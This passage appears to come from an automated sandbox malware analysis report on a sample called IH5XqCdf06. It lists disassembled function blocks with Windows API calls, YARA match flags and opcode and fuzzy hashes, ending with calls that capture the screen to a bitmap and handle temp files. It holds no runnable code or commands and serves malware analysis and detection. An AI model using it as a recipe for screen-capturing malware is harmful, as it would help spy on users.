                                                                                                      • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                      • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                      • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                    • EnumSystemLocalesW.KERNEL32(0043B3F5,00000001,00000000,?,004307B5,?,0043BA22,00000000,?,?,?), ref: 0043B33F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 2016158738-0
                                                                                                    • Opcode ID: 209f9151615a4c87f00d4ea0f4f536091c38e7646036be2875dd2bb4f2ddf691
                                                                                                    • Instruction ID: 7307f244e070286786186ca11be292e9958ff85af34fd5d1bf47ea8df294ed07
                                                                                                    • Opcode Fuzzy Hash: 209f9151615a4c87f00d4ea0f4f536091c38e7646036be2875dd2bb4f2ddf691
                                                                                                    • Instruction Fuzzy Hash: D91106362007019FDB189F3988917BBB791FF84318F15452DEA8687B40D375A902C784
                                                                                                    APIs
                                                                                                      • Part of subcall function 00672141: GetLastError.KERNEL32(?,?,0066A9EC,?,00000000,?,0066CDE6,0064247E,00000000,?,00451F20), ref: 00672145
                                                                                                      • Part of subcall function 00672141: _free.LIBCMT ref: 00672178
                                                                                                      • Part of subcall function 00672141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 006721B9
                                                                                                    • EnumSystemLocalesW.KERNEL32(0043B3F5,00000001,00000000,?,00670A1C,?,0067BC89,00000000,?,?,?), ref: 0067B5A6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 2016158738-0
                                                                                                    • Opcode ID: ffafb835184771a8fee8a968cb960d5e6389dd898606227e18ebf87d931cb5f8
                                                                                                    • Instruction ID: e2836e279315e401d1024d8b4e5d722af32b908ea2f04e4973174a652c541272
                                                                                                    • Opcode Fuzzy Hash: ffafb835184771a8fee8a968cb960d5e6389dd898606227e18ebf87d931cb5f8
                                                                                                    • Instruction Fuzzy Hash: 1D110C3B2007055FEB189F39C8A17BABB92FF84758B15892DEA4A87740D771B942CB40
                                                                                                    APIs
                                                                                                      • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                      • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                      • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                    • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0043B613,00000000,00000000,?), ref: 0043B8A1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$InfoLocale_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 787680540-0
                                                                                                    • Opcode ID: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
                                                                                                    • Instruction ID: 37b951b57323e1638715454beaabcd8ff4bbdb448c8d666509202632d17d74d0
                                                                                                    • Opcode Fuzzy Hash: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
                                                                                                    • Instruction Fuzzy Hash: 72F0F932910115BFDB2C6A6588057BB776CEF44764F15542FEE05A3280EB39FE4287D8
                                                                                                    APIs
                                                                                                      • Part of subcall function 00672141: GetLastError.KERNEL32(?,?,0066A9EC,?,00000000,?,0066CDE6,0064247E,00000000,?,00451F20), ref: 00672145
                                                                                                      • Part of subcall function 00672141: _free.LIBCMT ref: 00672178
                                                                                                      • Part of subcall function 00672141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 006721B9
                                                                                                    • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0067B87A,00000000,00000000,?), ref: 0067BB08
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$InfoLocale_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 787680540-0
                                                                                                    • Opcode ID: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
                                                                                                    • Instruction ID: a735f3618a429ed321b469c138c44ee3c721bff02dd91f5f0518d5631dc54d41
                                                                                                    • Opcode Fuzzy Hash: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
                                                                                                    • Instruction Fuzzy Hash: 46F0F932A00115ABDB289A24CC45BFA775AEB40B54F158469ED0DA3244EF70BE0286D4
                                                                                                    APIs
                                                                                                      • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                      • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                      • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                    • EnumSystemLocalesW.KERNEL32(0043B645,00000001,?,?,004307B5,?,0043B9E6,004307B5,?,?,?,?,?,004307B5,?,?), ref: 0043B3B4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 2016158738-0
                                                                                                    • Opcode ID: ff4b281e18efaa19658e03831a8d75929bd5cd68572c305843f6b1aa6eea9166
                                                                                                    • Instruction ID: e409c1f6f572afb8e53c6bef185f66c51efc5fed4ad0f11af6fa15d84cefb54f
                                                                                                    • Opcode Fuzzy Hash: ff4b281e18efaa19658e03831a8d75929bd5cd68572c305843f6b1aa6eea9166
                                                                                                    • Instruction Fuzzy Hash: 84F022362007045FDB159F3ADC91B6A7B90EF84328F15442EFE028B680D7B5AC028684
                                                                                                    APIs
                                                                                                      • Part of subcall function 00672141: GetLastError.KERNEL32(?,?,0066A9EC,?,00000000,?,0066CDE6,0064247E,00000000,?,00451F20), ref: 00672145
                                                                                                      • Part of subcall function 00672141: _free.LIBCMT ref: 00672178
                                                                                                      • Part of subcall function 00672141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 006721B9
                                                                                                    • EnumSystemLocalesW.KERNEL32(0043B645,00000001,?,?,00670A1C,?,0067BC4D,00670A1C,?,?,?,?,?,00670A1C,?,?), ref: 0067B61B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 2016158738-0
                                                                                                    • Opcode ID: be0c1418a5537eaa7c8022095862ccd701d6029552e7400e1215369425bfd1f6
                                                                                                    • Instruction ID: 805d0180ac603265d84ce0a3ece256bf188bb7110f4c9351f5aeada5ada854a4
                                                                                                    • Opcode Fuzzy Hash: be0c1418a5537eaa7c8022095862ccd701d6029552e7400e1215369425bfd1f6
                                                                                                    • Instruction Fuzzy Hash: 38F0C2363007055FDB246F39DC91BBA7B96EF80768F15842DFB098B651D7719C028644
                                                                                                    APIs
                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,0067047A,?,00000004), ref: 0067547A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: InfoLocale
                                                                                                    • String ID:
                                                                                                    • API String ID: 2299586839-0
                                                                                                    • Opcode ID: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
                                                                                                    • Instruction ID: fd91d008b0a7591572b065e61e68f4cdf67e456890f0d71c0401c09b336b9102
                                                                                                    • Opcode Fuzzy Hash: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
                                                                                                    • Instruction Fuzzy Hash: D8F02B31680318BFDB015F50CC02F6E7B66EF04B02F508159FC0A66290DAB19D21A6CE
                                                                                                    APIs
                                                                                                      • Part of subcall function 0042E3ED: EnterCriticalSection.KERNEL32(?,?,00431C7A,?,00457A38,00000008,00431D48,?,?,?), ref: 0042E3FC
                                                                                                    • EnumSystemLocalesW.KERNEL32(00434D87,00000001,00457BB8,0000000C), ref: 00434E05
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                    • String ID:
                                                                                                    • API String ID: 1272433827-0
                                                                                                    • Opcode ID: 47d67bb98ae687caab0f152daec36b922070e938420cb95d1256d2dc5184026a
                                                                                                    • Instruction ID: 538c22e4eb892f32bc8c86ea5e443232934619ae82977abc573478e901e73d8c
                                                                                                    • Opcode Fuzzy Hash: 47d67bb98ae687caab0f152daec36b922070e938420cb95d1256d2dc5184026a
                                                                                                    • Instruction Fuzzy Hash: D4F04F32A103009FE710EF69D906B9D77E1AF05726F10416AF910DB2E2CB7999808F49
                                                                                                    APIs
                                                                                                      • Part of subcall function 0066E654: RtlEnterCriticalSection.NTDLL(001F0DAF), ref: 0066E663
                                                                                                    • EnumSystemLocalesW.KERNEL32(00434D87,00000001,00457BB8,0000000C), ref: 0067506C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                    • String ID:
                                                                                                    • API String ID: 1272433827-0
                                                                                                    • Opcode ID: 149a1b447c4ca571c705eb83a82105c6c8b5f7f3924206eb96c0dadbe136b747
                                                                                                    • Instruction ID: 445a4dc1166038eedbffb7d7299979f58aff66f5a87c311aaec9d3726a47c881
                                                                                                    • Opcode Fuzzy Hash: 149a1b447c4ca571c705eb83a82105c6c8b5f7f3924206eb96c0dadbe136b747
                                                                                                    • Instruction Fuzzy Hash: 4AF08C32A10300DBE740EF68D902B4C77A1AF05722F10416AF900DB2A2C77589448B49
                                                                                                    APIs
                                                                                                      • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                      • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                      • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                    • EnumSystemLocalesW.KERNEL32(0043B1D9,00000001,?,?,?,0043BA44,004307B5,?,?,?,?,?,004307B5,?,?,?), ref: 0043B2B9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 2016158738-0
                                                                                                    • Opcode ID: d795fd725da8cf926aceeb2c3e7fa24b7794cc6b9bd948e6377232035fe4f002
                                                                                                    • Instruction ID: ec76e124c96d5fb6d75208995366108955e3ecd697e122142a5eb02f601840fd
                                                                                                    • Opcode Fuzzy Hash: d795fd725da8cf926aceeb2c3e7fa24b7794cc6b9bd948e6377232035fe4f002
                                                                                                    • Instruction Fuzzy Hash: C8F0553A30020897CB089F7BE81976BBF90EFC5754F0A409EEF098B290C3399942C794
                                                                                                    APIs
                                                                                                      • Part of subcall function 00672141: GetLastError.KERNEL32(?,?,0066A9EC,?,00000000,?,0066CDE6,0064247E,00000000,?,00451F20), ref: 00672145
                                                                                                      • Part of subcall function 00672141: _free.LIBCMT ref: 00672178
                                                                                                      • Part of subcall function 00672141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 006721B9
                                                                                                    • EnumSystemLocalesW.KERNEL32(0043B1D9,00000001,?,?,?,0067BCAB,00670A1C,?,?,?,?,?,00670A1C,?,?,?), ref: 0067B520
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 2016158738-0
                                                                                                    • Opcode ID: 17a3dc99c73c840853923c14692af3efa017a2bf6fb03d58d7281da58e8ea8e8
                                                                                                    • Instruction ID: c7729115f024e40e6618506d2310b7890fdc7538ad12adf78b70d7c7a9280f60
                                                                                                    • Opcode Fuzzy Hash: 17a3dc99c73c840853923c14692af3efa017a2bf6fb03d58d7281da58e8ea8e8
                                                                                                    • Instruction Fuzzy Hash: E4F0553A30020957CB089F36DC157AABF91EFC1754B1A805DEF098B290C3319842C790
                                                                                                    APIs
                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_00010672,0040FBF9), ref: 0041066B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                    • String ID:
                                                                                                    • API String ID: 3192549508-0
                                                                                                    • Opcode ID: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
                                                                                                    • Instruction ID: fa39807fe97804f53db995cd18131740e6dead46809b56a5c9e59eb8483b0dbe
                                                                                                    • Opcode Fuzzy Hash: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
                                                                                                    • Instruction Fuzzy Hash:
                                                                                                    APIs
                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00410672,0064FE60), ref: 006508D2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                    • String ID:
                                                                                                    • API String ID: 3192549508-0
                                                                                                    • Opcode ID: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
                                                                                                    • Instruction ID: fa39807fe97804f53db995cd18131740e6dead46809b56a5c9e59eb8483b0dbe
                                                                                                    • Opcode Fuzzy Hash: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
                                                                                                    • Instruction Fuzzy Hash:
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HeapProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 54951025-0
                                                                                                    • Opcode ID: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
                                                                                                    • Instruction ID: 646215492ee1b006629ac518ce4a11708067c45d14fae9e363609ac2be79142b
                                                                                                    • Opcode Fuzzy Hash: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
                                                                                                    • Instruction Fuzzy Hash: 3FA02230A00300EF8380CF30AE0830E3BE8BE03AC3B008238A002C3030EB30C0808B08
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 833578221895711969fd992aca003b8dff0ac6b0b4e24d9bd8e499997b964946
                                                                                                    • Instruction ID: 2844b30024e45351147ede59872166b67bb7d3639a7d84f230d679a3a0c0a750
                                                                                                    • Opcode Fuzzy Hash: 833578221895711969fd992aca003b8dff0ac6b0b4e24d9bd8e499997b964946
                                                                                                    • Instruction Fuzzy Hash: 32325761D69F014DE733A634C822336A258AFBB3D4F15E737E85AB5EA5EB2CC4834105
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 2dcf4a0559928c98f2b5d77cb0860f560abd3a2571bac000fbe95f0a84bb6040
                                                                                                    • Instruction ID: d13affd36985adaba9549dda1076aa7943650852f65e7c6b0ce314185b1835a0
                                                                                                    • Opcode Fuzzy Hash: 2dcf4a0559928c98f2b5d77cb0860f560abd3a2571bac000fbe95f0a84bb6040
                                                                                                    • Instruction Fuzzy Hash: 88E18470A08612EFD714CF24C590AAAB7F1FF44304B54457EE846ABB81D738F862DB96
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b270ae943b8fc30b0109646306f9a638257ad0854cfcd7f7143e4a79d383dfca
                                                                                                    • Instruction ID: ee8e61fee021999be074ab42fa322b1f3189aef8b6568b7b0cffe38dae4bf222
                                                                                                    • Opcode Fuzzy Hash: b270ae943b8fc30b0109646306f9a638257ad0854cfcd7f7143e4a79d383dfca
                                                                                                    • Instruction Fuzzy Hash: 9AD1F83210C1E30ECB6D4A39847007ABFE36A523A571D47AED4F7CB2C6ED24DA55E660
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 4bd5393d4189e9aa91ad74f9bcbb8c764c0ecaf8bff73b58941f35d4311e138b
                                                                                                    • Instruction ID: 543360d7dfb9058b4a8e0476cf2bcab449255d23345d35b398e8df16a867321f
                                                                                                    • Opcode Fuzzy Hash: 4bd5393d4189e9aa91ad74f9bcbb8c764c0ecaf8bff73b58941f35d4311e138b
                                                                                                    • Instruction Fuzzy Hash: 856154B1F0073876DA385A2CB892BBF63849F41748FE4041BE447DB381D69DDD82865E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
                                                                                                    • Instruction ID: 0bde8514e97d6dc57c5ca51acee5c23fffa9009d6d060a1e75ca754bd87b9ec4
                                                                                                    • Opcode Fuzzy Hash: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
                                                                                                    • Instruction Fuzzy Hash: 4A616671F007086BDB386A6C8899BFE6397EF95744F18051EE882DF3C1D615ED42839A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                    • Instruction ID: e183cc42c0575e46eff71331dfd644b760227977963c57612164f9205c38e507
                                                                                                    • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                    • Instruction Fuzzy Hash: 631138773030B1A3D604862DF8B46BFA395EBE63217EC426FC0424B748CE6AE9C1950C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                    • Instruction ID: cb8efd723472bea222c18448ad486cc1156129b63293bfaa8590cb40afe9105c
                                                                                                    • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                    • Instruction Fuzzy Hash: BF112B772011424FD664863ED8B41FBE787EBCA3207BC437ED0424B758DF26D9459640
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569778024.0000000000600000.00000040.00001000.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_600000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                    • Instruction ID: 1f69a860bf8d71d3b3c81236cba0a2225a9e349189ffd8aee9df26d7d0b276d3
                                                                                                    • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                    • Instruction Fuzzy Hash: F11130723801009FE754DE55DCD1FA773EAEB89320F2980A9ED05CB356D675E842C760
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                    • Instruction ID: 262e1e1660206696e02c4ca611e8598be51b0d47ea557291e80cb30d7adf52d2
                                                                                                    • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                    • Instruction Fuzzy Hash: 9101A276A006248FEF21CF64CC04BEA33FAEF86316F4544F5DA0A97381E774A9458B90
                                                                                                    APIs
                                                                                                    • DefWindowProcW.USER32(?,00000014,?,?), ref: 00402135
                                                                                                    • GetClientRect.USER32(?,?), ref: 0040214A
                                                                                                    • GetDC.USER32(?), ref: 00402151
                                                                                                    • CreateSolidBrush.GDI32(00646464), ref: 00402164
                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00402178
                                                                                                    • CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 00402183
                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00402191
                                                                                                    • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 004021A4
                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004021AF
                                                                                                    • MulDiv.KERNEL32(00000008,00000000), ref: 004021B8
                                                                                                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,Tahoma), ref: 004021DC
                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 004021EA
                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 00402267
                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 00402276
                                                                                                    • _wcslen.LIBCMT ref: 0040227F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateObjectSelect$BrushCapsClientColorDeviceFontModeProcRectRectangleSolidTextWindow_wcslen
                                                                                                    • String ID: Tahoma
                                                                                                    • API String ID: 3832963559-3580928618
                                                                                                    • Opcode ID: 06f3b736a1676dd81313cb3cb312b67037eb7e675966450ccfe924ee66f5f664
                                                                                                    • Instruction ID: 7336700d8ad07cb9e45a564d019af9580db2992b46b3f32d80e0fb6f80206702
                                                                                                    • Opcode Fuzzy Hash: 06f3b736a1676dd81313cb3cb312b67037eb7e675966450ccfe924ee66f5f664
                                                                                                    • Instruction Fuzzy Hash: F3710D72900228AFDB22DF64DD85FAEBBBCEF09751F0041A5B609E6155DA74AF80CF14
                                                                                                    APIs
                                                                                                    • DestroyWindow.USER32(?), ref: 004025CD
                                                                                                    • DefWindowProcW.USER32(?,00000204,?,?), ref: 004025DF
                                                                                                    • ReleaseCapture.USER32 ref: 004025F2
                                                                                                    • GetDC.USER32(00000000), ref: 00402619
                                                                                                    • CreateCompatibleBitmap.GDI32(?,-0045D5E7,00000001), ref: 004026A0
                                                                                                    • CreateCompatibleDC.GDI32(?), ref: 004026A9
                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 004026B3
                                                                                                    • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00CC0020), ref: 004026E1
                                                                                                    • ShowWindow.USER32(?,00000000), ref: 004026EA
                                                                                                    • GetTempPathW.KERNEL32(00000104,?), ref: 004026FC
                                                                                                    • GetTempFileNameW.KERNEL32(?,gya,00000000,?), ref: 00402717
                                                                                                    • DeleteFileW.KERNEL32(?), ref: 00402731
                                                                                                    • DeleteDC.GDI32(00000000), ref: 00402738
                                                                                                    • DeleteObject.GDI32(00000000), ref: 0040273F
                                                                                                    • ReleaseDC.USER32(00000000,?), ref: 0040274D
                                                                                                    • DestroyWindow.USER32(?), ref: 00402754
